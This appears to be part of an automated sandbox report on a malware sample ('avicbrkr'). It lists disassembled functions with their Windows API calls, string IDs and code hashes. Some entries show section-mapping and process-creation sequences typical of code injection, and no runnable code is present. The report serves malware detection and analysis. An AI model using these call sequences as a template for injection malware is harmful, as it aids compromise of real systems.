                      • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 00632776
                      • memset.NTDLL ref: 0063279B
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 006327B7
                      • NtClose.NTDLL(?), ref: 006327CB
                        • Part of subcall function 006326DC: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 00632709
                        • Part of subcall function 006326DC: RtlNtStatusToDosError.NTDLL(00000000), ref: 00632710
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorSectionStatus$CloseCreateViewmemset
                      • String ID:
                      • API String ID: 783833395-0
                      • Opcode ID: bd2dd21a209d5a6d12ff2f05fc24269b38462613aa0511ccc204924372d58649
                      • Instruction ID: 98e598f1a44b269ae6337031264216ad9b00f483ba31e97c2a6a39db1da6347a
                      • Opcode Fuzzy Hash: bd2dd21a209d5a6d12ff2f05fc24269b38462613aa0511ccc204924372d58649
                      • Instruction Fuzzy Hash: BC213C7190022AAFCB01DFA8CC849EEBBBAFF08B10F104516F911E7250D7709A558BE5
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038DEC8, Relevance: 6.1, APIs: 4, Instructions: 79nativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 0038DF23
                      • memset.NTDLL ref: 0038DF48
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 0038DF64
                      • NtClose.NTDLL(?), ref: 0038DF78
                        • Part of subcall function 0038DE89: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0038DEB6
                        • Part of subcall function 0038DE89: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038DEBD
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorSectionStatus$CloseCreateViewmemset
                      • String ID:
                      • API String ID: 783833395-0
                      • Opcode ID: a8740612b1c819dc1deed297107c5f634bf8224183f97fcf137cc1245095dbaa
                      • Instruction ID: e8683d35570b39abd23e32e66fac91f298940f2a8bbc8b9e1664beb76a58a913
                      • Opcode Fuzzy Hash: a8740612b1c819dc1deed297107c5f634bf8224183f97fcf137cc1245095dbaa
                      • Instruction Fuzzy Hash: 37211A71910329AFCB02EFA8DC449EEBBB9FF48750F100956FA11F7290D7719A549BA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00390D1B, Relevance: 4.8, APIs: 2, Strings: 1, Instructions: 269COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • memset.NTDLL ref: 00390D78
                      • LocalFree.KERNEL32(00000000), ref: 00390EF3
                        • Part of subcall function 00390CAF: memcpy.NTDLL(00000000,?,?,?,0039C008,EW9,00390EE7,?,?), ref: 00390CD3
                        • Part of subcall function 00390CEA: lstrlenW.KERNEL32(?,003970C0,0039C008,00390F37,00399508), ref: 00390CF0
                        • Part of subcall function 00390CEA: memcpy.NTDLL(00000000,?,00000002,00000002), ref: 00390D0C
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeapmemcpy$AllocateLocallstrlenmemset
                      • String ID: EW9
                      • API String ID: 2594422205-602920354
                      • Opcode ID: eea3d34592d04e434068c10a6b759cbefed89bd62ea4a20716b6ba7a635dde4f
                      • Instruction ID: ba0b746401bb1436030d19f52f9f80e44fc4eb8a214e23262b1ed6f668a5b924
                      • Opcode Fuzzy Hash: eea3d34592d04e434068c10a6b759cbefed89bd62ea4a20716b6ba7a635dde4f
                      • Instruction Fuzzy Hash: 44A1F372C00209EFDF27ABE4CC45AAEBBBAFF05314F154425E551A6160D7329E95EF10
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037DF75, Relevance: 4.5, APIs: 3, Instructions: 27memorynativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtUnmapViewOfSection.NTDLL(000001F4), ref: 0037DF9E
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 0037DFA5
                      • HeapFree.KERNEL32(00000000,00000000,000001F4), ref: 0037DFB4
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorFreeHeapSectionStatusUnmapView
                      • String ID:
                      • API String ID: 269469588-0
                      • Opcode ID: 54a7755d743d692d242f69757fb88251358a6d940999c2bc08d7869816359375
                      • Instruction ID: 86fdb597584757505e285df379ac2975af1eea91419974156fd01b282933cb6c
                      • Opcode Fuzzy Hash: 54a7755d743d692d242f69757fb88251358a6d940999c2bc08d7869816359375
                      • Instruction Fuzzy Hash: 3EE06D32515611ABD7336B54EC09F867B78AF86B11F024402F905961A0D766D8408B90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00384CC3, Relevance: 4.3, Strings: 3, Instructions: 575COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: $4V8$nj8
                      • API String ID: 2221118986-3563554493
                      • Opcode ID: 88149e77351085c37225b25cf501c2addae4bbe3fa4c09dcc594855ca3ca4b04
                      • Instruction ID: 4ca7aae98050ef7c6b5a136533de3547f59878d513e7f254575e2db89ba9089c
                      • Opcode Fuzzy Hash: 88149e77351085c37225b25cf501c2addae4bbe3fa4c09dcc594855ca3ca4b04
                      • Instruction Fuzzy Hash: FC42C030A00B058FCB26DF69C4907BAFBF1FF59304F6489AEC49697A51D774A986CB40
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00633C1B, Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                      • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 00633C4C
                      • RtlNtStatusToDosError.NTDLL(C000009A), ref: 00633C85
                        • Part of subcall function 006314BA: RtlUpcaseUnicodeString.NTDLL(?,0063764C,00000001), ref: 006314E6
                        • Part of subcall function 006314BA: RtlFreeAnsiString.NTDLL(?), ref: 00631564
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeapString$AllocateAnsiErrorInformationQueryStatusSystemUnicodeUpcase
                      • String ID:
                      • API String ID: 1666562127-0
                      • Opcode ID: da30157ac90579e47a2ba9850654b6f46a1fe2ec5d4c371231e2a64941030769
                      • Instruction ID: 2b47b4f22142bb255c3ae1978fed5beb81d53d84fd506de818a8ad5e7ccadaab
                      • Opcode Fuzzy Hash: da30157ac90579e47a2ba9850654b6f46a1fe2ec5d4c371231e2a64941030769
                      • Instruction Fuzzy Hash: F001F432902530BBDB225B69CD04AEFBA6B9F42B54F166118FE01BB311D7758F0192E4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038940B, Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 0038943C
                      • RtlNtStatusToDosError.NTDLL(C000009A), ref: 00389477
                        • Part of subcall function 00376DBD: RtlUpcaseUnicodeString.NTDLL(?,?,00000001), ref: 00376DF0
                        • Part of subcall function 00376DBD: RtlFreeAnsiString.NTDLL(?), ref: 00376E68
                        • Part of subcall function 00376DBD: WaitForSingleObject.KERNEL32(00000000), ref: 00376E76
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeapString$AllocateAnsiErrorInformationObjectQuerySingleStatusSystemUnicodeUpcaseWait
                      • String ID:
                      • API String ID: 3048131082-0
                      • Opcode ID: cd73680be32b2de0fac42b7f1e5fc86e0cdd88259ceabd7e1798a2515a814347
                      • Instruction ID: 3ea479848fce3b9f2f78c6d236503a354069f70474199cda295b7c9f9ac55c78
                      • Opcode Fuzzy Hash: cd73680be32b2de0fac42b7f1e5fc86e0cdd88259ceabd7e1798a2515a814347
                      • Instruction Fuzzy Hash: 6EF0D632912324AADB33BBA68C05BBFA65D9F45B40F1A4096FD05A71059B648D0293D1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00633B27, Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 00633B46
                      • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 00633B5E
                        • Part of subcall function 00633CB2: RtlNtStatusToDosError.NTDLL(C0000002), ref: 00633CDF
                        • Part of subcall function 00633CB2: SetLastError.KERNEL32(00000000,?,006322DE,00000000,0063244E,0063244E,00000004,?,00000000,00000000,0063605C,00000000), ref: 00633CE6
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Error$InformationLastProcessQueryStatusmemset
                      • String ID:
                      • API String ID: 3332669973-0
                      • Opcode ID: 670c5224fcbf3723f5763eb0bf94b5b46cd9e7e0d9e338fe9d6d995767cb8417
                      • Instruction ID: 0a855bf61859a6ab577302506d6e3244d04b61ab15ba80ed2535e985b67d9c5d
                      • Opcode Fuzzy Hash: 670c5224fcbf3723f5763eb0bf94b5b46cd9e7e0d9e338fe9d6d995767cb8417
                      • Instruction Fuzzy Hash: 78F0FFB690026CBADB50DA95CC05FDEBB6DEB14750F0080A5BA18E6191D770DB548BE4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003890AF, Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 003890CE
                      • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 003890E6
                        • Part of subcall function 003894A2: RtlNtStatusToDosError.NTDLL(C0000002), ref: 003894CF
                        • Part of subcall function 003894A2: SetLastError.KERNEL32(00000000,?,0038D667,00000000,?,00010007,00000004,?), ref: 003894D6
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Error$InformationLastProcessQueryStatusmemset
                      • String ID:
                      • API String ID: 3332669973-0
                      • Opcode ID: f47bece7368d256ae0f1693b46028bdcf515a2595e20dc8fd707eb4ea806ea2f
                      • Instruction ID: fe6f4c68d33dd896c0a005e24341e1caf100c8edf55f1adf9c9643df2257d0e3
                      • Opcode Fuzzy Hash: f47bece7368d256ae0f1693b46028bdcf515a2595e20dc8fd707eb4ea806ea2f
                      • Instruction Fuzzy Hash: 94F012B690421CBADF11EB91DC4AFEE7BBCAB04740F0440A1BA08E6191D775DB558BA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 006326DC, Relevance: 3.0, APIs: 2, Instructions: 28nativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 00632709
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 00632710
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorSectionStatusView
                      • String ID:
                      • API String ID: 1313840181-0
                      • Opcode ID: 0d3b88d318b96eb52eb80e0aa28e49aab707580c293b8d4465127781c8a77452
                      • Instruction ID: 30d040184bfc72da973d216fa0d2c47fb08cb1b590a876c40962161d96ef10c6
                      • Opcode Fuzzy Hash: 0d3b88d318b96eb52eb80e0aa28e49aab707580c293b8d4465127781c8a77452
                      • Instruction Fuzzy Hash: 5BE0EDB6900208FFEF059F94DC0FDEF7B7DEB44300F00856AB611A6151E6B0AA18DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038DE89, Relevance: 3.0, APIs: 2, Instructions: 28nativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0038DEB6
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 0038DEBD
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorSectionStatusView
                      • String ID:
                      • API String ID: 1313840181-0
                      • Opcode ID: 8ebb16a4518e123f8201894ebd9e74adacd3d1a3ae09da63fe7bfbe9d69be68a
                      • Instruction ID: 248bc805961f52183cdf9a4c8c89e3787071faa495f4292b2f399591fd359f6b
                      • Opcode Fuzzy Hash: 8ebb16a4518e123f8201894ebd9e74adacd3d1a3ae09da63fe7bfbe9d69be68a
                      • Instruction Fuzzy Hash: 8CE0E5B6910208FFDF059F94DC0FDEF7B7DEB44300F00856AF611A5150E6B1AA149B60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00374A27, Relevance: 2.9, Strings: 2, Instructions: 425COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseEnterLeaveSleepmemset$CreateErrorHandleLastQueryThreadValuelstrcpymbstowcsmemcpy
                      • String ID: pnls$~FvR9
                      • API String ID: 2687114040-181916723
                      • Opcode ID: 8a74b06f106d832cee82d42d7173499b585ba9bfcdf0a5cbe8f0975bca680af3
                      • Instruction ID: 16a4f0b9b08e68690b7631b1e4fdbd3ecdd9be3e9064741c766f377609cfaed7
                      • Opcode Fuzzy Hash: 8a74b06f106d832cee82d42d7173499b585ba9bfcdf0a5cbe8f0975bca680af3
                      • Instruction Fuzzy Hash: 7CD1A471B10316ABD733FBB49DC5B6B32ECAF08740B158866B849DB245DB39ED018760
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00384403, Relevance: 2.9, APIs: 2, Instructions: 416COMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 003847EC
                        • Part of subcall function 00384118: memset.NTDLL ref: 00384129
                        • Part of subcall function 00384118: memset.NTDLL ref: 00384135
                        • Part of subcall function 00384118: memset.NTDLL ref: 00384160
                      • memset.NTDLL ref: 003847DD
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memset
                      • String ID:
                      • API String ID: 2221118986-0
                      • Opcode ID: 6ee4bd29241c6ee520bba4337aa6bc1c5712ce623825292290905d75af18a4ec
                      • Instruction ID: 9500212206ab24ec9139e8f32d51f2c6e40833e8c34e67fc7709bef19cb95d01
                      • Opcode Fuzzy Hash: 6ee4bd29241c6ee520bba4337aa6bc1c5712ce623825292290905d75af18a4ec
                      • Instruction Fuzzy Hash: 82021070511B628FCB7ADB29C680566BBF0BF657107604E6ED6E786E90E731F881CB04
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003824E6, Relevance: 1.9, APIs: 1, Instructions: 611COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memset
                      • String ID:
                      • API String ID: 2221118986-0
                      • Opcode ID: 819c2c46a69b3733ff17a680ca6cc4523ee8a4f298073f0afd7945a7a8fe9f23
                      • Instruction ID: 67b8e342ec28e91bc378f6923eae74de31d882dd1dd3ddc8c7adf33b19db5822
                      • Opcode Fuzzy Hash: 819c2c46a69b3733ff17a680ca6cc4523ee8a4f298073f0afd7945a7a8fe9f23
                      • Instruction Fuzzy Hash: 7622847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037E764, Relevance: 1.8, APIs: 1, Instructions: 549COMMON
                      Download Yara Rule
                      APIs
                      • memcpy.NTDLL(?,00000000,00000000,000000FE,?,?,00000000), ref: 0037EB0B
                        • Part of subcall function 0037E690: memcpy.NTDLL(00000000,?,00000000,8B25EB0D,?,?,0037F764,?,?,?,00000000), ref: 0037E6E8
                        • Part of subcall function 0037E690: memcpy.NTDLL(?,?,?,8B25EB0D,?,?,0037F764,?,?,?,00000000), ref: 0037E713
                        • Part of subcall function 0037E690: memcpy.NTDLL(00000000,?,?,?,?,00000000), ref: 0037E72C
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID:
                      • API String ID: 3510742995-0
                      • Opcode ID: f1278b8e6998a4460bcfd0ca306df998882e10f6b0e1f395827835e093d38ea5
                      • Instruction ID: 3d9e9c90598ef83c749195aae842b6837453e4bdddfcd38d6de2c5ad2f3f70ed
                      • Opcode Fuzzy Hash: f1278b8e6998a4460bcfd0ca306df998882e10f6b0e1f395827835e093d38ea5
                      • Instruction Fuzzy Hash: AD328E70A00705DFDB36CF68C48066ABBF2FF48300F2585ADD89A9B691D778EA45CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037FCC4, Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID:
                      • String ID: @
                      • API String ID: 0-2766056989
                      • Opcode ID: c25733d85fa9b37bd23ae5a828271c17e6a894d62e2010f31db5039f771a3815
                      • Instruction ID: 028eec895313e994184be99ae38ba429de6bfe4f6e73e65825d86d85ccf5c0e5
                      • Opcode Fuzzy Hash: c25733d85fa9b37bd23ae5a828271c17e6a894d62e2010f31db5039f771a3815
                      • Instruction Fuzzy Hash: FAE19F71900219CFCF2ACF68C5906FEB7B1FF85304F25816EE856A7294D7389A55CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038D9D6, Relevance: 1.5, APIs: 1, Instructions: 38processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateProcessAsUserA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 0038DA10
                        • Part of subcall function 0038D89A: ResumeThread.KERNEL32(00000004,?,0038D936,?), ref: 0038D8AF
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CreateProcessResumeThreadUser
                      • String ID:
                      • API String ID: 3393100766-0
                      • Opcode ID: d40978ea55082924f2cf8b0e0a53191357e96491aa01faee1506a53139f586fc
                      • Instruction ID: 54b6f513c6fc480753b603d2350ddf38af57985869b052bf749a6ea0697cf947
                      • Opcode Fuzzy Hash: d40978ea55082924f2cf8b0e0a53191357e96491aa01faee1506a53139f586fc
                      • Instruction Fuzzy Hash: 2AF0E732215209AFDF025F99DC41CDA7FAAFF4D378B050225FA5992160C772D821AB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037C3A5, Relevance: 1.4, APIs: 1, Instructions: 156COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID:
                      • API String ID: 3510742995-0
                      • Opcode ID: 0eb81ac035f2f102480b272c2545c53a1a5f78b961ea166555c520ed7547918e
                      • Instruction ID: 0b9759ac4f13ab5180573767f0727734cae5b00e5161ba9740f586923c037df8
                      • Opcode Fuzzy Hash: 0eb81ac035f2f102480b272c2545c53a1a5f78b961ea166555c520ed7547918e
                      • Instruction Fuzzy Hash: 33516C71210B00AFD7328F6AC985A6BB7E5FF49320B149A2DE94ED7A10D778F841CB54
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038AB35, Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                      Download Yara Rule
                      APIs
                      • HeapFree.KERNEL32(00000000,003971C8,0038AD19), ref: 0038AB66
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeap
                      • String ID:
                      • API String ID: 3298025750-0
                      • Opcode ID: 35438fcc07f22b4af2a5b96708bf4ce167b09e5199481dee9ee1a5750d7f593d
                      • Instruction ID: 2e0c9cd7db1d3895d8896057bc5b7a5e7d798ba19cec6bb7fe0c937cd3760994
                      • Opcode Fuzzy Hash: 35438fcc07f22b4af2a5b96708bf4ce167b09e5199481dee9ee1a5750d7f593d
                      • Instruction Fuzzy Hash: 8EE0C274200600AFD72ACF15D945E22BBB5FF89310B10C69EE88A877A1D732E846CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037F8F8, Relevance: .4, Instructions: 386COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 654dda97600f0325757e25518b0105eb51fe5c6a7fbd7ce9e5c34c84f8a53ee2
                      • Instruction ID: 20ca0a30a8cd109732e1af9c9b8998ef4914960933730e529dff3ddf7dc751fc
                      • Opcode Fuzzy Hash: 654dda97600f0325757e25518b0105eb51fe5c6a7fbd7ce9e5c34c84f8a53ee2
                      • Instruction Fuzzy Hash: AFF155309086599FCB1ECFA9D0A05BCBBB2FF89314B24C1AED49A67645C7385A45CF14
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00380819, Relevance: .3, Instructions: 300COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID:
                      • API String ID: 3510742995-0
                      • Opcode ID: f63daed9048ee3475c4c9ab2d2c77ec2ee355eddec15846fb7d3d0a55980faea
                      • Instruction ID: 9895997623a96bfb7bfb47c1ba78a533530f5a73082bef8fc43b95e708b756e2
                      • Opcode Fuzzy Hash: f63daed9048ee3475c4c9ab2d2c77ec2ee355eddec15846fb7d3d0a55980faea
                      • Instruction Fuzzy Hash: 6EC11135600B408FD76AEF29C490A66B3E1FF88304B5449AED9D787B62D775F889CB40
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00634F58, Relevance: .1, Instructions: 77COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                      • Instruction ID: 0eb44bb463232a8634efaf665a1e39df6050e87e181626862dfed7caaef902db
                      • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                      • Instruction Fuzzy Hash: DF21B6329006049FCB14EF68C8C09A7B7A6FF44310F498569E9578B245D731FA15CBE0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00395C4C, Relevance: .1, Instructions: 77COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                      • Instruction ID: 5ff9bad46122407ae2f431a9769d9a447fda178e47f62277d9b797a72dee385f
                      • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                      • Instruction Fuzzy Hash: 3021A7329006059BCF16EF68C8C49A7B7A5BF45310B068158DD16DB245D730FA55CBE0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037CE1D, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 377memorystringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(0039ECB8,00000000,?,?), ref: 0037CE75
                        • Part of subcall function 00378138: memset.NTDLL ref: 00378174
                        • Part of subcall function 00378138: HeapFree.KERNEL32(00000000,00000000), ref: 00378191
                        • Part of subcall function 00378138: memcpy.NTDLL(?,?,0037C7DD,?,0037C7DD,?,?,00000000,?,00000000,0037CD1F,?,00000000), ref: 003781B2
                      • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0037CF0F
                      • lstrcpyn.KERNEL32(00000000,?,?), ref: 0037CF24
                        • Part of subcall function 0037B7D8: RtlEnterCriticalSection.NTDLL(0039D508), ref: 0037B7E3
                        • Part of subcall function 0037B7D8: Sleep.KERNEL32(0000000A,?,?,0037CF37,00000000), ref: 0037B7ED
                        • Part of subcall function 0037B7D8: SetEvent.KERNEL32(?,?,0037CF37), ref: 0037B844
                        • Part of subcall function 0037B7D8: RtlLeaveCriticalSection.NTDLL(0039D508), ref: 0037B863
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037CF40
                        • Part of subcall function 00378002: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00378064
                        • Part of subcall function 00378002: memcpy.NTDLL(00000000,http://,00000007,?,?,?,0037CF58,00000000), ref: 0037808A
                        • Part of subcall function 00378002: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,0037CF58,00000000), ref: 00378099
                        • Part of subcall function 00378002: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,0037CF58,00000000), ref: 003780AB
                      • HeapFree.KERNEL32(00000000,?), ref: 0037D106
                        • Part of subcall function 00377F9C: StrChrA.SHLWAPI(00000001,0000000D), ref: 00377FE6
                        • Part of subcall function 0037C211: HeapFree.KERNEL32(00000000,?,?), ref: 0037C27C
                        • Part of subcall function 0037C211: HeapFree.KERNEL32(00000000,?,?), ref: 0037C2B4
                        • Part of subcall function 0037C211: HeapFree.KERNEL32(00000000,?,?), ref: 0037C320
                      • StrChrA.SHLWAPI(?,00000020), ref: 0037D018
                      • StrChrA.SHLWAPI(00000001,00000020), ref: 0037D029
                      • lstrlen.KERNEL32(00000000), ref: 0037D03D
                      • memmove.NTDLL(?,?,00000001), ref: 0037D04D
                        • Part of subcall function 0037C6D4: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 0037C6F5
